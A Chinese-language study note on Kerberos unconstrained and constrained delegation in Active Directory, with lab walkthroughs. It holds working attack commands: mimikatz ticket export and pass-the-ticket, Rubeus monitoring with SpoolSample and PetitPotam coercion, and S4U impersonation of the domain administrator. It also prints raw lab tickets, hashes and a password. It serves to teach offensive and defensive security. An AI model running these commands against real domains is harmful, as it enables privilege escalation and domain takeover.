基于非约束/约束委派的原理和利用

前言:作为非约束/约束委派的学习笔记,自己尽量讲其讲的详细

参考文章:https://daiker.gitbook.io/windows-protocol/kerberos/2
参考文章:https://en.hackndo.com/constrained-unconstrained-delegation/

域委派是什么及其由来

域委派是指:将域内用户的权限委派给服务账号,使得服务账号能以用户权限开展域内活动

懂一个东西的产生,肯定要先知道为什么会产生这个东西?

在Windows 2000 Server首次发布Active Directory时,Microsoft必须提供一种简单的机制来支持用户通过kerberos向web server进行身份验证并需要代表该用户更新后端数据库服务器上的记录的方案。这通常称为"kerberos双跳问题",并且要求进行委派,以便web server在修改数据库记录时模拟用户。

这里说的"以便web server在修改数据库记录时模拟用户" 需要如何理解?

我自己理解的是就比如数据库中的相关数据需要修改,如果此时如果是让当前的web server的服务账户去进行修改的话,那么也就无法记录到到底是谁去修改了这个数据,此时如果出了问题就不知道该去问谁了,这种业务情况下就可能就是需要委派这种功能来进行解决,那么委派之后的情况就是,让当前的web server的服务账户去操作,但是web server同样带有客户的信息,在修改相关数据的时候,用的是对应客户操作者的记录。

上面这样做有什么好处呢?如果你设置了约束委派,被约束委派设置的服务账号将只能访问被指定的服务或资源,即限制机器的代理权限范围,使其仅能在授权范围内代表用户进行身份验证和访问资源。

这里还需要注意的一点就是接受委派的用户只能是服务账户或者主机账户,在域内只有主机账号和服务账号才有委派属性主机账号

  • 机器账户:活动目录中的computers组内的计算机,也被称为机器账号。

  • 服务账号:域内用户的一种类型,是服务器运行服务时所用的账号,将服务运行起来加入域内,比如:SQLServer,MYSQL等,还有就是域用户通过注册SPN也能成为服务账号。

服务账号(Service Account),域内用户的一种类型,服务器运行服务时所用的账号,将服务运行起来并加入域。就比如 SQL Server在安装时,会在域内自动注册服务账号SqlServiceAccount,这类账号不能用于交互式登录。

域委派的类型

目前域委派存在三种类型,非约束委派、约束委派、基于资源的约束委派,这里先来讲非约束委派和约束委派。

非约束性委派(Unconstrained Delegation)

客户想要访问一个指定服务的时候,如果该服务是被指定为需要非约束委派的话,那么该客户在申请完TGT,然后再申请完TGS(此时TGS会包含TGT),最后再拿着这个TGS向指定的服务(非约束委派),此时这个服务(非约束委派)可以获取客户在TGS中保存的TGT,又因为服务被设置为非约束委派,所以该服务会将TGS中保存的TGT进行保存在本地内存中,用于下次方便操作,最后再用这个TGT模拟用户访问 实现这个服务中可能需要的其他服务(我这里说的其他服务指的是可能也需要客户的票据)的,比如我下面举的一个实际需求。

微软的非约束委派的请求流程图如下所示

  1. 用户通过发送KRB_AS_REQ消息请求TGT1
  2. KDC在KRB_AS_REP消息中返回TGT1
  3. 用户再通过TGT1向KDC请求转发TGT2(这里的TGT2跟TGT1不同,这里的TGT2票据属性中存在可转发的标记Forwarded
  4. 在KRB_TGS_REP消息中返回转发TGT2(可转发的标记Forwarded
  5. 用户使用TGT1向KDC申请访问Service1的ST(服务票据)
  6. TGS返回给用户一个ST(服务票据)

到第六步这里,其实大家都看到了就是一个完整的kerberos票据验证流程,唯一有一个不同,那就是在请求了TGT1票据之后还会再去请求另一张TGT2票据,这个TGT2的票据跟TGT1唯一的不同点就是带有"可转发的标记Forwarded"

  1. 用户发送KRB_AP_REQ请求至Service1,这个请求中包含了TGT1和ST(服务票据)、TGT2、TGT2的Session key

在第七步的时候可以看到,发送给Service1的时候会发送了相关的TGT1 ST 和 TGT2 TGT2的Session key,需要注意的就是这里的TGT2(可转发的标记) TGT2的Session key会被存储到Service1中用于之后的请求

  1. Service1使用用户的TGT2(可转发的标记)通过KRB_TGS_REQ发送给KDC,以用户的名义请求能够访问Service2的票据ST2
  2. KDC在KRB_TGS_REP消息中返回Service2到Service1的票据ST2
  3. Service1以客户的名义用ST2发送KRB_AP_REQ请求

为什么是以客户的名义呢?个人理解就是因为上面我们说的TGT2(可转发的标记)来请求Service2。

  1. Service2响应步骤10中Service1的请求
  2. Service1响应步骤7中用户的请求
  3. 在这个过程中的TGT转发机制,没有限制Service1对TGT2的使用,也就是说Service1可以通过TGT2来请求任意服务
  4. KDC返回步骤13中请求的票据,15和16即为Service1通过模拟用户来访问其他ServiceXXXX

当user访问service1时,如果service1的服务账号如果开启了Unconstrained Delegation(非约束委派),则当user访问service1时会将user的TGT(带有可转发标记)发送给service1并保存在内存中以备下次重用,然后service1 就可以利用这张TGT以user的身份去访问域内的任何服务(任何服务是指user能访问的服务)了。

非约束委派的利用

我这里会把自己的疑惑点都给理一遍作为记录

问题1、网上的文章"在域内只有主机账号和服务账号才有委派属性主机账号",所以我这里会用来一遍 "只有主机账户" 和 "只有服务账户" 的环境

知识点:无约束委派跨域利用可以延展到跨域上利用,不过会受到SID History Filtering影响

环境搭建

原生的一台 WIN-BING-PC 机器名称的机器,什么委派我都还没做

同样其相关自定义SPN服务也不存在,默认如下图所示,这里需要注意的一点,你会看到这个WSMAN/WIN-BING-PC,后面在通过WINRM连接验证kerberos的时候的时候需要用到这个SPN服务,否则无法进行连接。

先来测试下环境的正确性,就是先试下委派是否存在,此时我什么都还没做,应该是不存在相关的委派利用的

然后域控进行访问 WIN-BING-PC 这台机器,通过命令Enter-PSSession -ComputerName WIN-BING-PC,走是的WSMAN服务

然后导出 WIN-BING-PC 机器中的票据,可以发现只有自己相关的凭据。

mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" exit

主机账号的非约束委派利用

非约束委派的设置,这里设置了主机账户为非约束委派

修正:微软在windows server 2003中引入了约束委派。

通过adFind进行查询,也可以看到此时已经被设置为了非约束委派

adFind -b dc=hengge,dc=com -f "(&(objectCategory=computer)(objectClass=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -dn

然后域控再次访问 WIN-BING-PC 这台机器,通过命令dir \\WIN-BING-PC\c$,走是的kerberos的cifs协议

然后导出 WIN-BING-PC 机器中的票据

mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" exit

结果发现还是没有相关的administrator的票据kirbi

接着我用域控通过命令来访问Enter-PSSession -ComputerName WIN-BING-PC

然后导出 WIN-BING-PC 机器中的票据

mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" exit

然后会看到一张基于导出了相关的域控中administrator的高权限票据

访问域控 dc1.hengge.com ,可以看到当前没有权限访问

然后这里来进行导入票据访问,可以发现成功进行访问了

mimikatz "kerberos::ptt [0;7f4a8]-2-0-60a10000-Administrator@krbtgt-HENGGE.COM.kirbi" exit

总结:我想了下为什么dir的时候不行,这个点我还是不太懂,按道理SPN中是可以进行CIFS协议访问的,并且通过机器名走的应该是kerberos,但是最终却无法进行导出,这个点不太懂,因为域控相关的补丁没有打,所以抓包也抓不了,之后这个点知道了,自己再来补上吧!

服务账号的非约束委派利用

在域中服务账户也可以进行相关非委派约束,我这里先创建一个域用户账号,然后之后将这个域用户作为服务账户

然后将这个账户sqladmin指定到一个对应的SPN服务,被设置了SPN服务之后,当前域账户同时也成为了服务账户

setspn -U -A variant/golden sqladmin

接着为这个sqladmin域用户配置非约束委派

之后将 sqladmin 用户登录到 WIN-BING-PC 上面,然后跟上面一样,让域控模拟访问被设置了非约束委派的机器,如下图所示

Enter-PSSession -ComputerName WIN-BING-PC

接着在 WIN-BING-PC 中导出相关票据,你会发现并没有相关高权限票据导出

mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" exit

最终作为服务账户这里是没有利用成功的,我这里自己想了下,出现的问题应该是我用sqladmin登录了一台计算器,而本身sqladmin是服务用户并且被设置了非约束委派。自己认为其实是可以利用的,不过sqladmin应该需要作为第三方软件(比如mssql,mysql等)的服务账户来进行启动,然后让高权限,比如域管账户去访问mssql,mysql等服务才可以。但是因为没有相关的环境,自己比较懒,也就不去尝试了...

非约束委派+Spooler

参考文章:https://adsecurity.org/?p=4056

原理实现:Windows Print System Remote Protocol是MS-RPRN中的一个老旧,但是默认的方法,通过该协议可以让域用户使用MS-RPRN RpcRemoteFindFirstPrinterChangeNotification (Ex)方法强制运行Spooler服务的机器通过kerberos或者NTLM验证攻击者的目标。

192.168.75.202 WIN-MG4C5QO445H 域控机器
192.168.75.158 WIN-MSSQL 域机器

Rubeus里面的TGT Monitoring模块需要高权限允许,如下图所示,可以看到我用aliguai域用户执行提示需要高权执行

这边我用本地管理员来进行运行,在非约束委派机器上每5秒抓取一次WIN-MG4C5QO445H$的TGT,如下图所示

Rubeus.exe monitor /interval:5 /filteruser:WIN-MG4C5QO445H$

这边需要注意,如下碰到了下面这种报错信息,可能是你这台非约束委派的机器没关闭防火墙,如果防火墙开了则接受不到外部域控发送过来的流量

接着这边执行下面的命令,可以看到域控已经请求过来了,并且rubeus成功导出对应的TGT票据,如下图所示

SpoolSample.exe WIN-MG4C5QO445H WIN-MSSQL

这边继续用rubeus来请求对应的域控cifs服务的TGS票据,如下图所示

Rubeus.exe asktgs /service:cifs/WIN-MG4C5QO445H.zpchcbd.com /nowarp /ticket:doIFnDCCBZigAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ0bC1pQQ0hDQkQuQ09NoiAwHqADAgECoRcwFRsGa3JidGd0GwtaUENIQ0JELkNPTaOCBFYwggRSoAMCARKhAwIBAqKCBEQEggRAcFxD+4Bt1Sxd5vI6ZwkCTfegax3hPoSKgcz/QnQIpjOxWHpTqrjVv8N+/WwlR1016ingB3BYLclOKrAAnYLt9s3BuHM7SNDbnKY6UeXfDOUECS67UNSCJIzpgXVfmDRxMzqJs99K6Gz15NH9qTLjUP+sa4ZWEQya35QEmKUWCvIqfq6uSm10OLg5/6FrnVNQsqRtf4dZUbHlE8jlBvbPe/s/YaEhztBHCSF7W/nEoraNw+RnhU+tbiiRQHq7R5vX9cKu72z8/cZedqq49pe99p8CXbRE6oDDAGPo3q7lQ0VRLFTbS7FAVfNdqJsujxChuv2xCcpScitXxgF7Z+qTH3E9xKnvu6QBSmQNw32w/wppgc+NkD4G6iEIkFi14nuMC1y2mX0SmFRrsQ1yGmogu5Qvguy5t3b62vihyvfvVznPpAk3jwAjGS7NZQVwkvernWpkCL1/ogVM+9HFypJWA1mbY76cz2LUhbY2pMOopkJ0vfuRp6TbVh1CpFG9GKKl4m+FjeI4WF1UVy9xx4LZamFTQfrMwN+SHBnSIIxh6cJSynTLY5rKbLwmP/qPGPhqiuUyP9EJYKk72AL0+nf3Lai4n1RExIvkml3vL90ghYa1m/76CY2ltIoB770rZhmYpybSPCxEAW8OGZtL5uYt9vXyE3yWVEzrIuEI5870uQ0AukDPAWBRzV+Rr2cGlS5ACYIM76h2keEi1D0688dvM/yrBTA/C6pY8aJgStGclKOxw0As+ROI6yf4C61PZqi2NOhihEkSz+A9VFw9DyexTBwQHBCHlRJOZJ/Qq/LepZi965RBQShYPd/BIUxanm0wbKUJ3s6ELqv5avvVB7dFBe8nssPKkCILWEfLonFF/mn7wjjCJ9wU0XRahS8+mAoVddagYh2jAItkv+y+brUQb7Jp0375nqvIXW3dMqVkMk/4c+hGAO2VlBRDQflCHbWsIroReYab3xeFMM4W/LcWR96YDDuU54x2skD2JBwO8CPvyeudBEXIsKpYxMOmFzGnB2TLLB2LXO5K9wL0PADqOAE9por1H2FqW4FiP7WL1jwtqiO6HO6PoYUPQ/hDhteou/0Rk9UX7710B7MFLQu8ZhOL8wZzBQd5g0NphU6cwOzCfphEFRwe3uN3ZstzywANf/MT/PAfH91M5TIgepG5KdauzQpd2DBG9QUOmLiYcWCR2DZK3/1DQ1LME504Uc2uSeeFxlTvHF4BzZbsTG1Z5bOzlsxDAM54mr3zMCzXQzhFq5uSxG28N16RDKmmbnR5ZqbQZXm0gLrz5FToBj0xOWSgb3f/UC+gcSFC3O7NJnkc0WHM2Gua9kMp6poPh2GzuYneIK2PZsZiPmWm/Y9IWNIiq3siZYd4QGMeJB4bGXodHELjOW9FIovYehgU2/qfIUU9KnEC3A+1nHH8ZYkw+g8veFuvareFNwK4rPLfMXmjgeswgeigAwIBAKKB4ASB3X2B2jCB16CB1DCB0TCBzqArMCmgAwIBEqEiBCDEcxphdNwwX2h0dQPwhJGR43/LIBYwVQMNrr0Kc5jRn6ENGwtaUENIQ0JELkNPTaIdMBugAwIBAaEUMBIbEFdJTi1NRzRDNVFPNDQ1SCSjBwMFAGChAAClERgPMjAyMzA3MDEwMjQwMDhaphEYDzIwMjMwNzAxMTI0MDA4WqcRGA8yMDIzMDcwNzA3MjYxM1qoDRsLWlBDSENCRC5DT02pIDAeoAMCAQKhFzAVGwZrcmJ0Z3QbC1pQQ0hDQkQuQ09N /ptt

dir \\WIN-MG4C5QO445H.zpchcbd.com\c$

这里还可以用petitpotamh来进行替代printbug,大家可以自己学习下,这边就不演示了

python petitpotam.py -u '' -p '' -d '' 192.168.4.11 192.168.4.130

接下来开始重头戏,到底什么是S4U2proxy和S4U2self

什么是S4U2Self和S4U2Proxy

S4U2self和S4U2proxy出现的原因就是由于非约束委派的不安全性

其中引入了包括一组名为S4U2Self(Service for User to Self)和S4U2Proxy(Service forUser to Proxy)的Kerberos协议扩展,这两个子协议是TGS协议的扩展

由于非约束委派的不安全性,微软在windows2003中发布了约束委派的功能,如下所示

在约束委派中的kerberos中,用户同样还是会将TGT发送给相关受委派的服务,但是由于S4U2proxy的影响,对发送给受委派的服务去访问其他服务做了限制,不允许受委派的服务代表用户使用这个TGT去访问任意服务,而是只能访问指定的服务。

S4U2self

允许受约束委派的服务代表任意用户向KDC请求服务自身,从而获得一张该用户(任意用户)的对当前受约束委派服务的票据TGS(ST),该服务票据TGS(ST)包含了用户的相关信息,比如该用户的组信息等。

S4U2proxy

允许受约束委派的服务通过服务票据ST,然后代表用户去请求指定的服务。

约束委派

用户请求一个约束委派的服务流程图如下:

请求过程如下:

  1. 用户向Service1发送请求。
  2. 这时在官方文档中的介绍是在这一流程开始之前用户已经通过了相关的kerberos验证,此时的Service1中已经存在了用户的TGT1票据(Forwardable标记),然后通过S4U2self模拟用户向KDC请求自身服务的ST1票据(Forwardable标记)
  3. KDC这时返回给Service1一个用于Service1自身的ST1票据(Forwardable标记),并且Service1用这个ST1票据(Forwardable标记)完成和用户的验证过程。
  4. Service1在步骤3使用模拟用户申请的ST1票据(Forwardable标记)完成与用户的验证,然后ST1票据(Forwardable标记)响应用户。

前四步的总结:

  • Service1是获得了用户的TGT(Forwardable的标记)
  • Service1通过模拟用户向KDC请求自身服务的ST1票据(Forwardable标记)

  1. 用户再次向Service1发起请求,此时Service1需要以用户的身份访问Service2。

这里官方文档提到了两个点:

  • Service1已经验证通过,并且有一个有效的TGT(Forwardable标记)。
  • Service1有从用户到Service1的Forwardable ST1(Forwardable标记)。
  1. Service1通过S4U2proxy代表用户用ST1(Forwardable标记,在S4U2SELF阶段获得的TGS票据,会放在AddtionTicket字段中)向KDC请求一个用于认证Service2的ST(我们称为ST2)。用户在ST1中通过cname(client name)和crealm(client realm)字段标识。
  2. KDC在接收到步骤6中Service1的请求之后,进行验证,然后返回Service2的服务票据ST2(Forwardable标记)
  3. Service1代表用户使用ST2请求Service2。
  4. Service2响应Service1的请求。
  5. Service1响应用户的请求。

在这个过程中:

S4U2self可以代表用户去请求针对其自身的kerberos服务票据(ST),这里s4u2self的作用其实就是为了解决用户不能以kerberos方式进行验证的一种方法,因为用户自己不能通过kerberos去获取相关的ST票据,所以可以通过s4u2self的方法去获取一张ST票据来用于之后的kerberos的协议认证

S4U2proxy可以以用户的名义请求其它服务的ST

"同时注意票据的Forwardable标记,有Forwardable标记为可转发的是能够通过S4U2Proxy扩展协议进行转发的,如果没有标记则不能进行转发" 这个说法不正确,这个可以参考daiker的文章中的内容,如下图所示

如何设置约束委派的服务账户

在Windows系统中,普通用户的属性中没有委派(Delegation)这个选项卡,只有服务账号、主机账号才有,也就是当前用户账户下存在相对应的服务,比如mssql,http等等服务

在域中只有服务账户才能有委派功能,所以先把用户yuyonghu01设置为服务账号。

setspn -U -A https/golden yuyonghu01

setspn -l xxxxx

如何找出被设置过委派属性的服务账户

首先:将用户yuyonghu01设置为 信任此用户作为其他任何服务的委派

查询非约束委派主要是通过搜索userAccountControl属性包含ADS_UF_TRUSTED_FOR_DELEGATION的主机或账户

非约束委派的查询:

通过Import-Module PowerView.ps1加载PowerView脚本之后使用下面的命令进行查询。

查询域中配置非约束委派的账户:
Get-NetUser -Unconstrained -Domain rootkit.org

查询域中配置非约束委派的主机:
Get-NetComputer -Unconstrained -Domain rootkit.org

查询约束委派则通过搜索userAccountControl属性包含TRUSTED_TO_AUTH_FOR_DELEGATION的主机或用户

约束委派的查询:

查询域中配置约束委派的账户:
Get-DomainUser -TrustedToAuth -Domain rootkit.org

查询域中配置约束委派的主机:
Get-DomainComputer -TrustedToAuth -Domain rootkit.org

约束委派服务账号的利用演示

在内网中利用约束委派进行攻击的最重要的一点是:约束委派的服务代表用户获得针对服务自身的kerberos票据这个过程,服务是不需要用户的凭据的,通过这个点,只要我们有约束委派的服务的账户和密码,那么通过这个服务就可以直接来进行攻击可以访问的相关服务。

约束委派的设置,如下图所示

  • 首先调用powerview模块进行约束委派的查询

get-DomainUser -TrustedToAuth -Domain pentest.God

  • 利用kekeo向KDC请求TGS服务票据
申请TGT:
tgt::ask /user:yuyonghu01 /domain:pentest.god /password:pass!@#QWE /ticket:yuyonghu01.kirbi

伪造任意权限S4U请求,申请TGS服务票据:
Tgs::s4u /tgt:TGT_yuyonghu01@PENTEST.GOD_krbtgt~pentest.god@PENTEST.GOD.kirbi /user:administrator@pentest.God /service:cifs/WIN-CKT0M35R6UO.pentest.god

  • 导入TGS服务票据,访问对应的服务

mimikatz "kerberos::ptt TGS_administrator@pentest.God@PENTEST.GOD_cifs~WIN-CKT0M35R6UO.pentest.god@PENTEST.GOD.kirbi" exit

约束委派主机账号的利用演示

上面演示了对应的委派服务账号的利用,这边再来演示下主机账户的利用,这边的话找台WIN-MSSQL主机来设置约束委派,如下图所示

这边在域控的机器上给WIN-MSSQL主机设置对域控WIN-MG4C5QO445H的cif的服务

WIN-MSSQL$主机的哈希是e7957d5cf2952c5cda700c91fab3fb9a,这边事先模拟已经拿到了被约束委派的主机账户的哈希值来进行利用,如下图所示

这边首先先申请TGT票据,申请结果如下所示

Rubeus.exe asktgt /user:WIN-MSSQL$ /domain:zpchcbd.com /rc4:e7957d5cf2952c5cda700c91fab3fb9a

然后再通过s4u2self/s4u2proxy来模拟administrator权限ST票据向域控请求cifs服务,如下图所示

Rubeus.exe s4u /ticket:doIFEDCCBQygAwIBBaEDAgEWooIEJjCCBCJhggQeMIIEGqADAgEFoQ0bC1pQQ0hDQkQuQ09NoiAwHqADAgECoRcwFRsGa3JidGd0Gwt6cGNoY2JkLmNvbaOCA+AwggPcoAMCARKhAwIBAqKCA84EggPKo0yBeYeJIfr59B3APUTjyqMmcLmHJcmQhEicPHoRCCcJCET8LqgJTGqtcCUw9m7GuconTz/AlXSv6edThKGZ3F8hkynUJmeyJf1IPFMDIbTpel66gMcmo/r/xtXs9aqTy8n/+cnaN6TrfiHTrOTQiwTsYIn0DXjF9RK+OrHoX2dmI3EK+1+WFrGeXqWc+0WQV4TL8MRVm7iB/d701BwCeye80N4xAV+XTKkcIbw9EHuD9Qm66WZpO8FQSz287lO+/hszCTUPj04TazS8ov7zLxu1kUFG0irhW4OX9VR624QXcgO5DOQrOxSQdQDfqhS7cDwuXob1Q5yjUcCwJxhiZhUFXO4rNvooY+B7qvEnQKsOyg8NQcreQYG52He4dAGm1wQ0txOh91r0vz5h3YpNaMY2WPgDijmvK3gJRCClL72M7WLIM94iXaG4Y+FyeEPfIpZlytZs/r/Tnxw+GOPae6ZlYHl+CAPFZeY7CaORLU5Xwf3jQohqsiWhdfooyKSFUqd4lIUDuh0n5jPbdHPYbbq9UVZFRT6SXppKx8qVreGkRoMlAicMz28sqML7XDfpqLCXZDfJP/YAGFOkt3FNAOAhA1wLOmxbroznW49lOMY7uivu2CA5p/afguvm0/c6hyl4V/uvqiAvx41hTHmNiU599gb2z214a82X/NKGBBFbWoLtDN5zDLn6H6OojUJ8yMpDP17gQK6cXlpHKZScUATmCwilwPuPdl4AiabK5gqVWnYo+iC5173exOADioMx/hKL0ki583cCfTKAWbgiPyScZNY2RpMPDgfF4xFVn4+CJredH4KIKAAB941UDKYpLaczMOP9nzFxsojUTUQr2WFQCp8PfJJ60UEt1+FTOVsbyPdpk/h2We6b2Uxd29W5a87M2UnvrjWMe6UvvsAtahyQeRLfBS/WSoGRmX/7RIrCISDBfxEQ7hmXxtMwiI2NBynBXnOdU7dvpjHGpzuPkC/7EqLoi09RqivQ8s4cS/iyNRplEfYWXIcJXSfZpEpL8luC3IcJ6MV4Noyw67U+nCZht5MbSKSCbWWXJkitt2ylNJOajhST5HheyTPZY71tnAuLLhzd/SPvNmVbv9NfSWE3RyVzvys1cAU5iIUFoyrHdcee6G+vhRq5Ua/0o0TDW+hOpH4ZgdO23tssDqP/NWD7n1Xznx0ltO8xkTO70H5VvIa3qatMMwWCsQUe9LWfh14udvfFMkbVrYnsciXLL5lQeD0zsBsa8uQJ60flpeW7j/UUeGUqXmqEcemVOnrCvKXu0vhuYMydkqOB1TCB0qADAgEAooHKBIHHfYHEMIHBoIG+MIG7MIG4oBswGaADAgEXoRIEEGWdcovnR/a+cPFCd02u5zKhDRsLWlBDSENCRC5DT02iFzAVoAMCAQGhDjAMGwpXSU4tTVNTUUwkowcDBQBA4QAApREYDzIwMjMwNjMwMTQ0NzI1WqYRGA8yMDIzMDcwMTAwNDcyNVqnERgPMjAyMzA3MDcxNDQ3MjVaqA0bC1pQQ0hDQkQuQ09NqSAwHqADAgECoRcwFRsGa3JidGd0Gwt6cGNoY2JkLmNvbQ== /impersonateuser:administrator /msdsspn:cifs/WIN-MG4C5QO445H.zpchcbd.com /altservice:cifs /ptt

执行列目录的命令dir \\WIN-MG4C5QO445H.zpchcbd.com\c$,可以看到成功列出域控的目录,如下图所示

约束委派的拓展利用

拓展知识:当S4U2Proxy向KDC申请对应服务的TGS后,返回的TGS中的server name是加密的,service name是不加密的,所以当我们在内存中修改TGS的service name,我们就能获取同一主机上不同服务的访问权限。

利用条件:仅限注册SPN时只使用了服务名跟主机名且未使用端口,如www/testserver3.ol.com可以利用,而MSsql/sql.ol.com:1433这种就无法利用。

约束委派的拓展利用演示

WIN-MG4C5QO445H 域控机器 192.168.75.202

WIN-MSSQL 域机器 192.168.75.158

WIN-6R2MMNGJLI3 域机器 192.168.75.156

这里我设置同一台机器域控机器上具有2种约束委派服务,委派账户(这边测试环境中的设置的机器账户,服务账户效果是一样的)与服务类型是一对一对应关系,如下分别对应不同的账户服务:

  • cifs服务对应的委派账户为WIN-MSSQL,该主机账户的哈希值是e7957d5cf2952c5cda700c91fab3fb9a

  • www服务对应的委派账户为WIN-6R2MMNGJLI3,该主机账户的哈希值是a8b93c18dada22dcd0a2a54687882c65

这边先用WIN-MSSQL委派的主机账户来通过s4u2self/s4u2proxy来伪造administrator来请求域控的cifs服务,这边跟上面的利用是一样的,是正常可以利用的

Rubeus.exe asktgt /user:WIN-MSSQL$ /domain:zpchcbd.com /rc4:e7957d5cf2952c5cda700c91fab3fb9a
Rubeus.exe s4u /ticket:doIFEDCCBQygAwIBBaEDAgEWooIEJjCCBCJhggQeMIIEGqADAgEFoQ0bC1pQQ0hDQkQuQ09NoiAwHqADAgECoRcwFRsGa3JidGd0Gwt6cGNoY2JkLmNvbaOCA+AwggPcoAMCARKhAwIBAqKCA84EggPK0uPRSGY0yZZ/61Kh/drRM1FBKbKBSCk0AuCHoR01cQmxY6qIRUrCzzzWgFsmuzxvvtHinMhwsMLtWiTgaqwEvu2+Ww9zs4X43kBQYqn/xZj7gFzRjYvKG4jNfpUdOLGSmmLl0Gk73BNbpWwhhSI/8NqJ4ZWiA+6G3hHc1sP6/Pa1BSeOubwgNJOeG8ilYmZMq2t94jYdiN7ax3tWBGKVQvM696uOTu4u/WcxRWsXwna1Rs9QhY/eJRbnwkD2HkAaRwzIHUyPOfHzjr/OnQxZ/4y1KGb5G3ZFuHk7vU4L+Xll8atwe7zYEKosnJu0T+QaU1uqxcMciR1yWlHXXkT3xD4s1EXB3aHnBxtcpLihG5pnvom/9Hggfe68UQy4dZFaSnT7KeJp26NGiAUKY8E2nsuLezXWcuu+sj7YHOuCzZnMFTvtL1ObUV/xWxVybhquXaMnLLoJQAjpDh1gg6TQLrD0NOR4ve2rNCJqtOufbw5+byuog7ecjO8CgC00IfTHNiCTBiMTsl8LLVQQzqytalpE4soWjegEJBhO6vetS4roCoGzuAzxYSzedV21wSNtuPyQTgJRZZzEf3uOxavhDAc0X4s4QelKDpYXkU0sFwoINlhFLCnhAGhqGnknpdzSVkg0t1Jn30pN6tPwW2nPDnbmlZ8enHM9Xt3GKhNRNAJxlRDlFT65cY0N1Ng4VXaYBpZgNtriVYEprAAcOXC1maOuq53YFTqGIQF5yZ5T6NL7NbOsZ3ZruVW0G5+r0N4IiK2/q9YQ17+q9KAnvzwyiiUqxvMXMBpN0jYuYGxbzdXPggP3rH8ffhSuy5RWNOk2KKU15oCR7i3hhMCIUztnA3jj2WGpVS0zhW+O9VlHVTgj+3e0u7IuVye5c6X9Rnz+HFL2AWG/xVppgKDQatH0J6bmzrLqHHg8HJMoswOaz8iafsrPdU5JdHXcd0grF4y362WQPGZC4Ye77fyuyKy/JVe7oLg92bYNs3yjDnuS29w3lJD5k35XqM+hj9N878WUm1AM6Rfmi3UiUDQdRtBm0dhO9BzDC2bPB2LPMd1SnZvwwMaiUBk9p1h8mAgv7c5AmZ1rujb10+aj5d+q9ZksjR/W7Hauch61IpqAY6UUxblUR3qveYWGylyMTRUP25AT4FVctYDv07SziG6gL+rIan5OyQLW/3vL4i1iAfVdbb2FbBbj5GKJFYVx4eEmRjagF8tWUQ0Dtlg8rbJPqUcoATwGlh3nhNByD+bqTVvbDhRM3+vj5J3HyT6LmqMySN+ABOrAOjHwMZcafaOB1TCB0qADAgEAooHKBIHHfYHEMIHBoIG+MIG7MIG4oBswGaADAgEXoRIEEHcUtfzYz+yhE/1zlcUDf3KhDRsLWlBDSENCRC5DT02iFzAVoAMCAQGhDjAMGwpXSU4tTVNTUUwkowcDBQBA4QAApREYDzIwMjMwNjMwMTczMzA5WqYRGA8yMDIzMDcwMTAzMzMwOVqnERgPMjAyMzA3MDcxNzMzMDlaqA0bC1pQQ0hDQkQuQ09NqSAwHqADAgECoRcwFRsGa3JidGd0Gwt6cGNoY2JkLmNvbQ== /impersonateuser:administrator /msdsspn:cifs/WIN-MG4C5QO445H.zpchcbd.com /altservice:cifs /ptt
dir \\WIN-MG4C5QO445H.zpchcbd.com\c$

那么这里继续来用WIN-6R2MMNGJLI3委派主机账户来请求对应www服务,可以发现申请对应的服务票据也同样没有什么问题,如下图所示

Rubeus.exe asktgt /user:WIN-6R2MMNGJLI3$ /domain:zpchcbd.com /rc4:a8b93c18dada22dcd0a2a54687882c65
Rubeus.exe s4u /ticket:doIFPDCCBTigAwIBBaEDAgEWooIETDCCBEhhggREMIIEQKADAgEFoQ0bC1pQQ0hDQkQuQ09NoiAwHqADAgECoRcwFRsGa3JidGd0Gwt6cGNoY2JkLmNvbaOCBAYwggQCoAMCARKhAwIBAqKCA/QEggPw3DX/gV0jrArYVTBEA6ZEdASHd6sdayg90TCiJ6DFbJkKyUBW3sDm88xKxTcVIjlIsNa/Mawwenxct/UB7sBXjgpTCkjXWTXxOEnJGhLLl+tTFupVlA8jJ4sXvnjgb61I30j8NwCrMyLEyvIz3pB5CmfQE/sambAc9MpnrWDaJ/VVrOIs9ZLBbOMt0Bd/IrSDRAyldFLIj8qzRmiTRwI+zmNLMFBdvI4pmaUJne2Kjml19XmuxOlqynQ8/C7G6tvMs0G/aTj/7pPb2Rqin5odyBZLzmQf4SPJZZUcZyAWQY4S0icvK//HKBwzFkwF21WuaNOnY577sbYt8UhzP9jvm4nDND8nxauSMAxss11K24lfqgYUm4VsXcGiTMFMFjwDefV9vHdGoV+97w1c89gKDeoXU+FiITQu13X8cZrzDVlZ+iV+vCxbmo207Nxk93Yt4ETCOZuivf1CnD0TeMkz2DV5Lnj2+oSFK9VeYYpDvBfwv1dFcTcLcsItVDnH9hoPcdXM//M2iqwgVYXucDH936tqf88K9M05ReibhZnofhbl3KDpnBy0FNKCfHfYDwmn/7fR7uORZkbEjdr128GMfm5njARdHvKDbC4CABq38RXVBLB0TKl+w51jQeHLoRP8rphz38A5iSVItuTG/xgHyINZ4o1ZKEJ27jAuLlw3Wcj0H2SHORVZFPu/JrNC2yvcMnTExrZ3Z3U7vs+43zBjdaEWgONXR58x11RDzMikGnrX6sXENlYKGsszbL0u307ftxNK8CiPqeEMaXWDpHqJn06ZEgik259Oy+/5xhCYAdHy9mY9ybYR0YkiZOYJwThifUZ4aXReKQcwBfevuBQn2ht0jknaSlNfEodZV80qrfAUKlLEFfyYaVFxob0FE4thV+izA0e6/JUnKeLttR5iNFip7cw6Ju7zBGwbhIKZi7QHG3EHZmVnGlk6R3G3K9tuxqJZu/EkpmQ24C+Z0oPyMiCZ+ldfuqtg9k8h0bb1zepD/re9BroXMP7IPBMlOUtKfgQl0dglgHucWku7AhGkdLLW58RnX6Wp3zIY+id6K+89M0CYoBYigIdEuJcebG/EXMlqbu6iTNkkRWf1z1ksy7C5OQTRtld6VHGGQbXAWrodC56M4fBoIznB4lE30VnnTSQOUW9eNRkVbWFcmDdHsfV2OVbZjXy68TCAuUrsZ4tPpzbBz/WP5cS1eLsM/ttycaU7gZQqvFIT+b+2yenemNXXaKmjvAl7tcYSSLWcU/Ale2+wqbTBLLlzjNgk+Yn1I2myWeeJ/U51vbsEU1AX6/F8kyVOqCZj8O05/JbDofg4A8JCCIh8ZXa7Zm8Xp4tro4HbMIHYoAMCAQCigdAEgc19gcowgceggcQwgcEwgb6gGzAZoAMCARehEgQQ2d+hpn8fDOTGdbBE0scWGKENGwtaUENI